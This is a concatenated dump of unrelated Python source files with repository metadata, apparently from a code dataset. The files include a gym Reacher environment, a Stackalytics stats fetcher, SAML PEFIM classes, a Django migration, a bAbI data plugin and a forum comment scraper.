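    choice = dialog.interact()
    if choice == "Fire!":
        angle, vel, height = dialog.getValues()
        print(angle, vel, height)
    dialog.close()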
| 30.137931
| 71
| 0.568078
| 1,568
| 0.897025
| 0
| 0
| 0
| 0
| 0
| 0
| 490
| 0.28032
|
420e4e16ca0ab83a3724fd3b5d5775cec3e14b0e
| 979
|
py
|
Python
|
gym_envs/envs/reacher_done.py
|
gautams3/reacher-done
|
6420f4ea3e0f6e47a3ebe25dbe170a9030b03b01
|
[
"MIT"
] | 1
|
2021-11-13T13:51:37.000Z
|
2021-11-13T13:51:37.000Z
|
gym_envs/envs/reacher_done.py
|
gautams3/reacher-done
|
6420f4ea3e0f6e47a3ebe25dbe170a9030b03b01
|
[
"MIT"
] | null | null | null |
gym_envs/envs/reacher_done.py
|
gautams3/reacher-done
|
6420f4ea3e0f6e47a3ebe25dbe170a9030b03b01
|
[
"MIT"
] | 2
|
2021-04-08T12:48:29.000Z
|
2021-05-09T02:04:33.000Z
|
import gym
from gym import error, spaces, utils
from gym.utils import seeding
from gym.envs.mujoco.reacher import ReacherEnv
import numpy as np
class ReacherDoneEnv(ReacherEnv):
metadata = {'render.modes': ['human']}
# def __init__(self):
# ...
def step(self, action):
self.do_simulation(action, self.frame_skip)
vec = self.get_body_com("fingertip")-self.get_body_com("target")
dist = np.linalg.norm(vec)
reward_dist = - dist
reward_ctrl = - 0.3 * np.square(action).sum()
reward_time = -0.2 # 5 times larger, to see the effect of time reward
done = dist < 0.04 # done if it's close enough
done_reward = 2
reward = reward_dist + reward_ctrl + reward_time + done*done_reward
ob = self._get_obs()
info = dict(reward_dist=reward_dist, reward_ctrl=reward_ctrl, dist=dist)
return ob, reward, done, info
# def reset(self):
# super().reset()
# def render(self, mode='human'):
# ...
# def close(self):
# ...
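# Hedged usage sketch (not part of the original file): assuming a working
# gym / mujoco-py installation, the environment can be driven directly like
# any other Gym environment.
if __name__ == "__main__":
    env = ReacherDoneEnv()
    ob = env.reset()
    for _ in range(1000):
        ob, reward, done, info = env.step(env.action_space.sample())
        if done:
            print("reached target, distance:", info["dist"])
            break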
| 31.580645
| 76
| 0.668029
| 711
| 0.726251
| 0
| 0
| 0
| 0
| 0
| 0
| 259
| 0.264556
|
420ed2750c333b6a9c2bf33a7391b56504549e6c
| 4,639
|
py
|
Python
|
stackalytics/get_metric.py
|
yaoice/python_demo
|
024f42f9cfce757bdaddf24202d8547801f0e8f6
|
[
"Apache-2.0"
] | null | null | null |
stackalytics/get_metric.py
|
yaoice/python_demo
|
024f42f9cfce757bdaddf24202d8547801f0e8f6
|
[
"Apache-2.0"
] | 2
|
2021-02-08T20:17:39.000Z
|
2021-06-01T21:49:12.000Z
|
stackalytics/get_metric.py
|
yaoice/python_demo
|
024f42f9cfce757bdaddf24202d8547801f0e8f6
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
import httplib2
import json
import sys
from prettytable import PrettyTable
from config import field
class BaseStackalytics(object):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(BaseStackalytics, cls).__new__(cls, *args, **kwargs)
return cls._instance
class Stackalytics(BaseStackalytics):
def __init__(self, prefix):
super(Stackalytics, self).__init__()
self._prefix = prefix
self._http_instance = self.get_http_instance()
def get_http_instance(self):
return httplib2.Http(".cache")
def get_metrics(self, url):
try:
return self._http_instance.request(self._prefix + url,
"GET",
headers={'Accept': 'application/json'})
except httplib2.ServerNotFoundError:
print "Url {} not found".format(url)
sys.exit(1)
def main():
company_statistics = {}
engineer_statistics = {}
stackalytics = Stackalytics("http://stackalytics.com")
for project_type in field['project_type']:
company_statistics[project_type] = {}
for company in field['company']:
company_statistics[project_type][company] = {}
for metric in field['metric']:
company_statistics[project_type][company][metric] = {}
url = "/api/1.0/stats/companies?release={}&metric={}&project_type={}&company={}".format(field['release'],
metric,
project_type,
company)
resp, content = stackalytics.get_metrics(url)
stats = json.loads(content)['stats']
try:
metric_dict = stats[0]
except IndexError:
metric_dict = {'id': company, 'metric': 0}
company_statistics[project_type][company][metric] = metric_dict
for project_type in field['project_type']:
engineer_statistics[project_type] = {}
for engineer in field['engineers']['ids']:
engineer_statistics[project_type][engineer] = {}
for metric in field['metric']:
engineer_statistics[project_type][engineer][metric] = {}
engineers_url = "/api/1.0/stats/engineers?&release={}&metric={}"\
"&project_type={}&company={}&user_id={}".format(field['release'],
metric,
project_type,
field['engineers']['owercompany'],
engineer)
engineers_resp, engineers_content = stackalytics.get_metrics(engineers_url)
engineers_stats = json.loads(engineers_content)['stats']
try:
engineers_metric_dict = engineers_stats[0]
except IndexError:
engineers_metric_dict = {'id': engineer, 'metric': 0}
engineer_statistics[project_type][engineer][metric] = engineers_metric_dict
engineer_table_field = ['metric'] + [engineer for engineer in field['engineers']['ids']]
for project_type in field['project_type']:
print "{} {} project by tencent individual:".format(field['release'], project_type)
table = PrettyTable(engineer_table_field)
for metric in field['metric']:
table.add_row([metric] + [engineer_statistics[project_type][engineer][metric]['metric'] for engineer in field['engineers']['ids']])
print table
table_field = ['metric'] + [company.replace('%20', ' ') for company in field['company']]
for project_type in field['project_type']:
print "{} {} project by company:".format(field['release'], project_type)
table = PrettyTable(table_field)
for metric in field['metric']:
table.add_row([metric] + [company_statistics[project_type][company][metric]['metric'] for company in field['company']])
print table
# print company_statistics
if __name__ == '__main__':
sys.exit(main())
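# Hedged sketch of the `field` structure main() expects from config.py
# (inferred from the keys accessed above; every concrete value below is an
# illustrative assumption, not the project's real configuration):
#
#     field = {
#         'release': 'pike',
#         'project_type': ['openstack'],
#         'company': ['Tencent'],
#         'metric': ['commits', 'loc'],
#         'engineers': {'owercompany': 'Tencent', 'ids': ['example_user']},
#     }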
| 43.764151
| 143
| 0.527053
| 881
| 0.189912
| 0
| 0
| 0
| 0
| 0
| 0
| 669
| 0.144212
|
421097c0f352c62da6301188c7377f912e0f1d54
| 1,465
|
py
|
Python
|
modules/worker.py
|
strangest-quark/iConsent
|
096a471a8f5c61dcb9cff5fb380ddb55848bf055
|
[
"MIT"
] | 10
|
2020-08-08T13:59:10.000Z
|
2020-11-13T23:13:57.000Z
|
modules/worker.py
|
strangest-quark/iConsent
|
096a471a8f5c61dcb9cff5fb380ddb55848bf055
|
[
"MIT"
] | 1
|
2021-09-08T02:26:48.000Z
|
2021-09-08T02:26:48.000Z
|
modules/worker.py
|
strangest-quark/iConsent
|
096a471a8f5c61dcb9cff5fb380ddb55848bf055
|
[
"MIT"
] | 2
|
2021-07-29T07:40:59.000Z
|
2022-01-28T03:20:22.000Z
|
import logging
from queue import Queue
from threading import Thread
from time import time
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class Worker(Thread):
def __init__(self, queue, out_que):
Thread.__init__(self)
self.queue = queue
self.out_que = out_que
def run(self):
while True:
# Get the work from the queue and expand the tuple
video, txnId = self.queue.get()
try:
v = video.generate_video_part(txnId)
self.out_que.put(v)
finally:
self.queue.task_done()
def main(video_obj_arr, txnId, n):
ts = time()
# Create a queue to communicate with the worker threads
queue = Queue()
out_que = Queue()
    # Create 2 worker threads
for x in range(2):
worker = Worker(queue, out_que)
# Setting daemon to True will let the main thread exit even though the workers are blocking
worker.daemon = True
worker.start()
# Put the tasks into the queue as a tuple
for i in range(1, n):
logger.info('Queueing {}'.format(i))
queue.put((video_obj_arr[i-1], txnId))
# Causes the main thread to wait for the queue to finish processing all the tasks
queue.join()
logging.info('Took %s', time() - ts)
return out_que
if __name__ == '__main__':
main()
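# Hedged usage sketch (not part of the original module): main() needs a list of
# objects exposing generate_video_part(txnId), plus a transaction id and a count,
# so the bare main() call above only works once those are supplied. VideoStub is
# a hypothetical stand-in used purely for illustration.
class VideoStub:
    def __init__(self, part):
        self.part = part

    def generate_video_part(self, txnId):
        return (txnId, self.part)


def demo():
    videos = [VideoStub(i) for i in range(1, 5)]
    results = main(videos, txnId='txn-123', n=5)
    while not results.empty():
        print(results.get())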
| 28.173077
| 102
| 0.619795
| 463
| 0.316041
| 0
| 0
| 0
| 0
| 0
| 0
| 429
| 0.292833
|
4212519f45b1cf9dfda4da64b4b3fae6c56b03b5
| 2,420
|
py
|
Python
|
src/saml2/extension/pefim.py
|
cnelson/pysaml2
|
a30e51c271e27e4411a0243b65adbf5d7a3abb07
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/pysaml2-4.4.0/src/saml2/extension/pefim.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/pysaml2-4.4.0/src/saml2/extension/pefim.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
#!/usr/bin/env python
import saml2
from saml2 import SamlBase
from saml2.xmldsig import KeyInfo
NAMESPACE = 'urn:net:eustix:names:tc:PEFIM:0.0:assertion'
class SPCertEncType_(SamlBase):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEncType element """
c_tag = 'SPCertEncType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info',
[KeyInfo])
c_cardinality['key_info'] = {"min": 1}
c_attributes['VerifyDepth'] = ('verify_depth', 'unsignedByte', False)
c_child_order.extend(['key_info'])
def __init__(self,
key_info=None,
x509_data=None,
verify_depth='1',
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
if key_info:
self.key_info = key_info
elif x509_data:
self.key_info = KeyInfo(x509_data=x509_data)
else:
self.key_info = []
self.verify_depth = verify_depth
#self.x509_data = x509_data
def spcertenc_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEncType_, xml_string)
class SPCertEnc(SPCertEncType_):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEnc element """
c_tag = 'SPCertEnc'
c_namespace = NAMESPACE
c_children = SPCertEncType_.c_children.copy()
c_attributes = SPCertEncType_.c_attributes.copy()
c_child_order = SPCertEncType_.c_child_order[:]
c_cardinality = SPCertEncType_.c_cardinality.copy()
def spcertenc_from_string(xml_string):
return saml2.create_class_from_xml_string(SPCertEnc, xml_string)
ELEMENT_FROM_STRING = {
SPCertEnc.c_tag: spcertenc_from_string,
SPCertEncType_.c_tag: spcertenc_type__from_string,
}
ELEMENT_BY_TAG = {
'SPCertEnc': SPCertEnc,
'SPCertEncType': SPCertEncType_,
}
def factory(tag, **kwargs):
return ELEMENT_BY_TAG[tag](**kwargs)
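# Hedged usage sketch (not part of the original module): the factory dispatches
# on the tag names registered above; verify_depth here is an illustrative value.
if __name__ == '__main__':
    enc = factory('SPCertEnc', verify_depth='2')
    print(enc.c_tag, enc.verify_depth)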
| 31.428571
| 80
| 0.654959
| 1,743
| 0.720248
| 0
| 0
| 0
| 0
| 0
| 0
| 417
| 0.172314
|
42144545d417abe762a3d9307033d86aace5b332
| 805
|
py
|
Python
|
ontask/migrations/0004_remove_old_migration_refs.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 33
|
2017-12-02T04:09:24.000Z
|
2021-11-07T08:41:57.000Z
|
ontask/migrations/0004_remove_old_migration_refs.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 189
|
2017-11-16T04:06:29.000Z
|
2022-03-11T23:35:59.000Z
|
ontask/migrations/0004_remove_old_migration_refs.py
|
pinheiroo27/ontask_b
|
23fee8caf4e1c5694a710a77f3004ca5d9effeac
|
[
"MIT"
] | 30
|
2017-11-30T03:35:44.000Z
|
2022-01-31T03:08:08.000Z
|
# Generated by Django 2.2.4 on 2019-08-24 06:02
from django.db import connection as con, migrations
from psycopg2 import sql
def remove_old_migration_refs(apps, schema_editor):
__sql_delete_migration_ref = 'DELETE FROM django_migrations WHERE app={0}'
old_apps = [
'action', 'core', 'dataops', 'logs', 'oauth', 'ontask_oauth',
'profiles', 'scheduler', 'table', 'workflow']
with con.cursor() as cursor:
for app_name in old_apps:
cursor.execute(
sql.SQL(__sql_delete_migration_ref).format(
sql.Literal(app_name)))
class Migration(migrations.Migration):
dependencies = [
('ontask', '0003_transfer_siteprefs'),
]
operations = [
migrations.RunPython(code=remove_old_migration_refs),
]
| 26.833333
| 78
| 0.650932
| 201
| 0.249689
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.264596
|
42149897d0b37e2db558007492da879e2a80968d
| 639
|
py
|
Python
|
scripts/tfloc_summary.py
|
lldelisle/bx-python
|
19ab41e0905221e3fcaaed4b74faf2d7cda0d15a
|
[
"MIT"
] | 122
|
2015-07-01T12:00:22.000Z
|
2022-03-02T09:27:35.000Z
|
scripts/tfloc_summary.py
|
lldelisle/bx-python
|
19ab41e0905221e3fcaaed4b74faf2d7cda0d15a
|
[
"MIT"
] | 64
|
2015-11-06T21:03:18.000Z
|
2022-03-24T00:55:27.000Z
|
scripts/tfloc_summary.py
|
lldelisle/bx-python
|
19ab41e0905221e3fcaaed4b74faf2d7cda0d15a
|
[
"MIT"
] | 60
|
2015-10-05T19:19:36.000Z
|
2021-11-19T20:53:54.000Z
|
#!/usr/bin/env python
"""
Read TFLOC output from stdin and write out a summary in which the nth line
contains the number of sites found in the nth alignment of the input.
TODO: This is a very special case, should it be here?
"""
import sys
from collections import defaultdict
counts = defaultdict(int)
max_index = -1
for line in sys.stdin:
if line[0].isdigit():
current_index = int(line)
max_index = max(current_index, max_index)
elif line[0] == "'":
counts[current_index] += 1
else:
raise ValueError("Invalid input line " + line)
for i in range(max_index + 1):
print(counts.get(i, 0))
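# Illustrative run (an assumption about the TFLOC output format implied by the
# parser above): index lines start with a digit, site lines start with a quote.
#
#     $ printf "0\n'site\n'site\n2\n'site\n" | python tfloc_summary.py
#     2
#     0
#     1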
| 22.821429
| 74
| 0.674491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 250
| 0.391236
|
4214b1ee9bcb816a48babcc6e1d8cfe461c7c2c0
| 3,649
|
py
|
Python
|
plugins/data/bAbI/digitsDataPluginBAbI/data.py
|
Linda-liugongzi/DIGITS-digits-py3
|
6df5eb6972574a628b9544934518ec8dfa9c7439
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/data/bAbI/digitsDataPluginBAbI/data.py
|
Linda-liugongzi/DIGITS-digits-py3
|
6df5eb6972574a628b9544934518ec8dfa9c7439
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/data/bAbI/digitsDataPluginBAbI/data.py
|
Linda-liugongzi/DIGITS-digits-py3
|
6df5eb6972574a628b9544934518ec8dfa9c7439
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
import os
from digits.utils import subclass, override, constants
from digits.extensions.data.interface import DataIngestionInterface
from .forms import DatasetForm, InferenceForm
from . import utils
from flask_babel import lazy_gettext as _
DATASET_TEMPLATE = "templates/dataset_template.html"
INFERENCE_TEMPLATE = "templates/inference_template.html"
@subclass
class DataIngestion(DataIngestionInterface):
"""
A data ingestion extension for the bAbI dataset
"""
def __init__(self, is_inference_db=False, **kwargs):
super(DataIngestion, self).__init__(**kwargs)
self.userdata['is_inference_db'] = is_inference_db
if 'train_text_data' not in self.userdata:
# get task ID
try:
task_id = int(self.task_id)
except:
task_id = None
self.userdata['task_id'] = task_id
# get data - this doesn't scale well to huge datasets but this makes it
            # straightforward to create a mapping of words to indices and figure out max
# dimensions of stories and sentences
self.userdata['train_text_data'] = utils.parse_folder_phase(
self.story_folder, task_id, train=True)
self.userdata['stats'] = utils.get_stats(self.userdata['train_text_data'])
@override
def encode_entry(self, entry):
stats = self.userdata['stats']
return utils.encode_sample(entry, stats['word_map'], stats['sentence_size'], stats['story_size'])
@staticmethod
@override
def get_category():
return "Text"
@staticmethod
@override
def get_id():
return "text-babi"
@staticmethod
@override
def get_dataset_form():
return DatasetForm()
@staticmethod
@override
def get_dataset_template(form):
"""
parameters:
- form: form returned by get_dataset_form(). This may be populated
with values if the job was cloned
return:
- (template, context) tuple
- template is a Jinja template to use for rendering dataset creation
options
- context is a dictionary of context variables to use for rendering
the form
"""
extension_dir = os.path.dirname(os.path.abspath(__file__))
template = open(os.path.join(extension_dir, DATASET_TEMPLATE), "r").read()
context = {'form': form}
return (template, context)
@override
def get_inference_form(self):
return InferenceForm()
@staticmethod
@override
def get_inference_template(form):
extension_dir = os.path.dirname(os.path.abspath(__file__))
template = open(os.path.join(extension_dir, INFERENCE_TEMPLATE), "r").read()
context = {'form': form}
return (template, context)
@staticmethod
@override
def get_title():
return _("bAbI")
@override
def itemize_entries(self, stage):
entries = []
if not self.userdata['is_inference_db']:
data = self.userdata['train_text_data']
n_val_entries = int(len(data)*self.pct_val/100)
if stage == constants.TRAIN_DB:
entries = data[n_val_entries:]
elif stage == constants.VAL_DB:
entries = data[:n_val_entries]
elif stage == constants.TEST_DB:
if not bool(self.snippet):
raise ValueError("You must write a story and a question")
entries = utils.parse_lines(str(self.snippet).splitlines())
return entries
| 31.730435
| 105
| 0.636339
| 3,216
| 0.881337
| 0
| 0
| 3,226
| 0.884078
| 0
| 0
| 1,033
| 0.283091
|
4216517a1b9daa01aa443bee25e4880a6b96ed43
| 3,767
|
py
|
Python
|
13_TransparentOrigami/fold2.py
|
dandrianneDEL/PyAdventOfCode2021
|
ea91186383c0855c81c7243d527de0c4dd4c0afb
|
[
"MIT"
] | null | null | null |
13_TransparentOrigami/fold2.py
|
dandrianneDEL/PyAdventOfCode2021
|
ea91186383c0855c81c7243d527de0c4dd4c0afb
|
[
"MIT"
] | null | null | null |
13_TransparentOrigami/fold2.py
|
dandrianneDEL/PyAdventOfCode2021
|
ea91186383c0855c81c7243d527de0c4dd4c0afb
|
[
"MIT"
] | null | null | null |
import filehelper
fileResult = filehelper.readfile()
class Matrix:
cells: list[list[bool]]
maxX: int
maxY: int
def __init__(self, sizeX:int, sizeY:int) -> None:
self.cells = []
self.maxX = sizeX
self.maxY = sizeY
# print(f"INIT matrix {sizeX}x{sizeY}")
for y in range(sizeY+1):
row = [False] * (sizeX+1)
self.cells.append(row)
def fill_coords(self, coords:list[int]) -> None:
for carthesianCoordinate in coords:
x = carthesianCoordinate[0]
y = carthesianCoordinate[1]
self.cells[y][x] = True
def subselect(self, xStart:int, yStart:int, xMax:int, yMax:int, translateX: int, translateY: int) -> 'Matrix':
print(f"x={xStart}-{xMax}, y={yStart}-{yMax}")
newMatrix = Matrix(xMax-xStart, yMax-yStart)
coords = []
for x in range(xStart,xMax+1):
for y in range(yStart, yMax+1):
if self.cells[y][x]:
coords.append([x-translateX, y-translateY])
print(f"part coords(translateY={translateY}): {coords}")
newMatrix.fill_coords(coords)
return newMatrix
def merge_y(self, half2:'Matrix')->'Matrix':
merged = Matrix(self.maxX, self.maxY-1)
coords = []
# populate cell if either folds are populated
for x in range(self.maxX+1):
for y in range(self.maxY):
if self.cells[y][x] or half2.cells[half2.maxY-y][x]:
coords.append([x,y])
merged.fill_coords(coords)
return merged
def merge_x(self, half2:'Matrix')->'Matrix':
merged = Matrix(self.maxX-1, self.maxY)
coords = []
for x in range(self.maxX):
for y in range(self.maxY+1):
if self.cells[y][x] or half2.cells[y][half2.maxX-x]:
coords.append([x,y])
merged.fill_coords(coords)
return merged
def fold(self, fold) -> 'Matrix':
if fold[0] == 'y':
yAxisToFold = fold[1]
self.print(yAxisToFold, -1)
merged = self.fold_y(yAxisToFold)
else:
xAxisToFold = fold[1]
self.print(-1, xAxisToFold)
merged = self.fold_x(xAxisToFold)
merged.print(-1, -1)
return merged
def fold_y(self, y:int) -> 'Matrix':
half1 = self.subselect(0, 0, self.maxX, y, 0, 0)
half2 = self.subselect(0, y, self.maxX, self.maxY, 0, y)
return half1.merge_y(half2)
def fold_x(self, x:int) -> 'Matrix':
half1 = self.subselect(0, 0, x, self.maxY, 0, 0)
half2 = self.subselect(x, 0, self.maxX, self.maxY, x, 0)
return half1.merge_x(half2)
def print(self, splitY:int, splitX:int) -> None:
for y in range(len(self.cells)):
row = self.cells[y]
txt = ""
for x in range(len(row)):
flag = row[x]
if y == splitY:
txt += "-"
elif x == splitX:
txt += "|"
elif flag:
txt += "#"
else:
txt += f"."
print(txt)
# ******************************************
# PART 2 - Fold plastic transparent sheet
# Finish folding the transparent paper according to the instructions. The manual says the code is always eight capital letters.
# What code do you use to activate the infrared thermal imaging camera system?
# ******************************************
matrix = Matrix(fileResult.maxX, fileResult.maxY)
matrix.fill_coords(fileResult.coords)
# Perform folds
for fold in fileResult.folds:
print(f"performing fold {fold}")
matrix = matrix.fold(fold)
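# Small self-contained fold demo (a sketch, not part of the original solution;
# it does not depend on filehelper): fold a 5x7 dot grid along y=3, so the
# point at (0, 6) lands on (0, 0) and (2, 5) lands on (2, 1).
demo = Matrix(4, 6)
demo.fill_coords([[0, 0], [0, 6], [2, 5]])
demo = demo.fold(('y', 3))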
| 34.87963
| 127
| 0.535439
| 3,169
| 0.841253
| 0
| 0
| 0
| 0
| 0
| 0
| 628
| 0.166711
|
421750365075d0ccd2892de6546549e569376c1b
| 208
|
py
|
Python
|
complete/01 - 10/Problem1/main.py
|
this-jacob/project-euler
|
8f9e700e2875e84d081eade44fd2107db0a0ae12
|
[
"MIT"
] | null | null | null |
complete/01 - 10/Problem1/main.py
|
this-jacob/project-euler
|
8f9e700e2875e84d081eade44fd2107db0a0ae12
|
[
"MIT"
] | null | null | null |
complete/01 - 10/Problem1/main.py
|
this-jacob/project-euler
|
8f9e700e2875e84d081eade44fd2107db0a0ae12
|
[
"MIT"
] | null | null | null |
def main():
total = 0
for i in range(0, 1000):
if i % 3 == 0:
total += i
elif i % 5 == 0:
total += i
print(total)
if __name__ == '__main__':
main()
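# Equivalent computation as a sketch (not part of the original solution): the
# elif chain in main() never double-counts multiples of 15, so a single
# generator expression gives the same total.
def main_oneliner():
    return sum(i for i in range(1000) if i % 3 == 0 or i % 5 == 0)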
| 13.866667
| 28
| 0.408654
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 10
| 0.048077
|
4218d80702b95a80fa35592557c09dc27cf8233c
| 206
|
py
|
Python
|
reward/batcher/transforms/base_transform.py
|
lgvaz/torchrl
|
cfff8acaf70d1fec72169162b95ab5ad3547d17a
|
[
"MIT"
] | 5
|
2018-06-21T14:33:40.000Z
|
2018-08-18T02:26:03.000Z
|
reward/batcher/transforms/base_transform.py
|
lgvaz/reward
|
cfff8acaf70d1fec72169162b95ab5ad3547d17a
|
[
"MIT"
] | null | null | null |
reward/batcher/transforms/base_transform.py
|
lgvaz/reward
|
cfff8acaf70d1fec72169162b95ab5ad3547d17a
|
[
"MIT"
] | 2
|
2018-05-08T03:34:49.000Z
|
2018-06-22T15:04:17.000Z
|
class BaseTransform:
def transform_s(self, s, training=True):
return s
def transform_batch(self, batch, training=True):
return batch
def write_logs(self, logger):
pass
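# Minimal subclass sketch (an assumption, not part of the original module):
# concrete transforms override the hooks above and keep the identity defaults
# for anything they do not need.
class ScaleStateTransform(BaseTransform):
    def __init__(self, factor):
        self.factor = factor

    def transform_s(self, s, training=True):
        return s * self.factor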
| 20.6
| 52
| 0.645631
| 205
| 0.995146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
4219aa019cf5a624b152bb0ddf85c0a457ed2c73
| 2,416
|
py
|
Python
|
webapp/scan_comments.py
|
ctrl-meta-f/ngk
|
6d9122ee84cc7420f9b135556c7b03e9b20428e4
|
[
"BSD-2-Clause"
] | null | null | null |
webapp/scan_comments.py
|
ctrl-meta-f/ngk
|
6d9122ee84cc7420f9b135556c7b03e9b20428e4
|
[
"BSD-2-Clause"
] | null | null | null |
webapp/scan_comments.py
|
ctrl-meta-f/ngk
|
6d9122ee84cc7420f9b135556c7b03e9b20428e4
|
[
"BSD-2-Clause"
] | null | null | null |
import logging
import time
import requests
import lxml.etree
import re
import os
from schema import ScopedSession, SyncState
logging.basicConfig(
filename=os.getenv("LOG_FILE", "../logs/scan_comments.log"),
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG)
COMMENTS_URL = "http://govnokod.ru/comments"
FAST_DELAY = 15
SLOW_DELAY = 60
FAST_TO_SLOW_STEPS = 20
def fetch_latest_comments():
logging.debug("Fetching comments...")
r = requests.get(COMMENTS_URL)
r.raise_for_status()
root = lxml.etree.HTML(r.content)
comments = []
for link in root.xpath('//a[@class="comment-link"]'):
m = re.search("/([0-9]+)#comment([0-9]+)", link.get("href"))
post_id = int(m.group(1))
comment_id = int(m.group(2))
comments.append((post_id, comment_id))
return comments
def update_sync_states(comments):
has_updates = False
with ScopedSession() as session:
for post_id, comment_id in comments:
state = session.query(SyncState).filter(SyncState.post_id == post_id).one_or_none()
if not state:
logging.info("Got new comment %d for new post %d", comment_id, post_id)
has_updates = True
state = SyncState(post_id=post_id, last_comment_id=comment_id, pending=True, priority=SyncState.PRIORITY_HAS_COMMENTS)
session.add(state)
else:
if state.last_comment_id is None or comment_id > state.last_comment_id:
logging.info("Got new comment %d for post %d", comment_id, post_id)
has_updates = True
state.last_comment_id = comment_id
state.pending = True
state.priority=SyncState.PRIORITY_HAS_COMMENTS
return has_updates
logging.info("=== started ===")
fast_requests = 0
while True:
try:
comments = fetch_latest_comments()
has_updates = update_sync_states(comments)
if has_updates:
fast_requests = FAST_TO_SLOW_STEPS
except Exception as e:
logging.exception(e)
fast_requests = 0
if fast_requests > 0:
delay = FAST_DELAY
fast_requests -= 1
else:
delay = SLOW_DELAY
logging.debug("Sleeping for %d seconds (%d fast requests left)...", delay, fast_requests)
time.sleep(delay)
| 29.463415
| 134
| 0.631623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 344
| 0.142384
|
421a32da4769d80ffba1268d31b7a676642e60fc
| 1,009
|
py
|
Python
|
s3prl/upstream/example/hubconf.py
|
hhhaaahhhaa/s3prl
|
a469787f05c42196c4d989555082f5fd9dcbe8a6
|
[
"Apache-2.0"
] | 856
|
2021-01-15T15:40:32.000Z
|
2022-03-31T07:08:17.000Z
|
s3prl/upstream/example/hubconf.py
|
hhhaaahhhaa/s3prl
|
a469787f05c42196c4d989555082f5fd9dcbe8a6
|
[
"Apache-2.0"
] | 210
|
2021-01-15T13:28:50.000Z
|
2022-03-30T06:13:51.000Z
|
s3prl/upstream/example/hubconf.py
|
hhhaaahhhaa/s3prl
|
a469787f05c42196c4d989555082f5fd9dcbe8a6
|
[
"Apache-2.0"
] | 208
|
2021-01-15T03:03:12.000Z
|
2022-03-31T08:33:27.000Z
|
from .expert import UpstreamExpert as _UpstreamExpert
def customized_upstream(*args, **kwargs):
"""
To enable your customized pretrained model, you only need to implement
upstream/example/expert.py and leave this file as is. This file is
used to register the UpstreamExpert in upstream/example/expert.py
    The following is a brief introduction to the registration mechanism.
The s3prl/hub.py will collect all the entries registered in this file
(callable variables without the underscore prefix) as a centralized
upstream factory. One can pick up this upstream from the factory via
1.
from s3prl.hub import customized_upstream
model = customized_upstream(ckpt, model_config)
2.
model = torch.hub.load(
'your_s3prl_path',
'customized_upstream',
ckpt,
model_config,
source='local',
)
    Our run_downstream.py and downstream/runner.py follow the first usage
"""
return _UpstreamExpert(*args, **kwargs)
| 32.548387
| 74
| 0.716551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 862
| 0.854311
|
421a86ab2fcc5ca9b6f576b1a9c163c17517de0f
| 463
|
py
|
Python
|
g-code-testing/g_code_parsing/g_code_functionality_defs/thermocycler/set_ramp_rate_g_code_functionality_def.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
g-code-testing/g_code_parsing/g_code_functionality_defs/thermocycler/set_ramp_rate_g_code_functionality_def.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
g-code-testing/g_code_parsing/g_code_functionality_defs/thermocycler/set_ramp_rate_g_code_functionality_def.py
|
Opentrons/protocol_framework
|
ebbd6b2fe984edd6ecfcbf1dbe040db7f7356b9f
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict
from g_code_parsing.g_code_functionality_defs.g_code_functionality_def_base import (
GCodeFunctionalityDefBase,
)
class SetRampRateGCodeFunctionalityDef(GCodeFunctionalityDefBase):
@classmethod
def _generate_command_explanation(cls, g_code_args: Dict[str, str]) -> str:
return (
"Setting thermocycler ramp rate."
"\nNote: This is an unimplemented feature, setting this does nothing"
)
| 33.071429
| 84
| 0.740821
| 318
| 0.686825
| 0
| 0
| 247
| 0.533477
| 0
| 0
| 102
| 0.220302
|
421c7e1609af23f9ed8e7709fd3cc2ca7ae61d73
| 19,452
|
py
|
Python
|
src/mrio.py
|
ElcoK/MRIA_Argentina
|
45194eb738c725276c3667078ac8d229554b550e
|
[
"MIT"
] | null | null | null |
src/mrio.py
|
ElcoK/MRIA_Argentina
|
45194eb738c725276c3667078ac8d229554b550e
|
[
"MIT"
] | null | null | null |
src/mrio.py
|
ElcoK/MRIA_Argentina
|
45194eb738c725276c3667078ac8d229554b550e
|
[
"MIT"
] | 2
|
2021-06-28T11:51:17.000Z
|
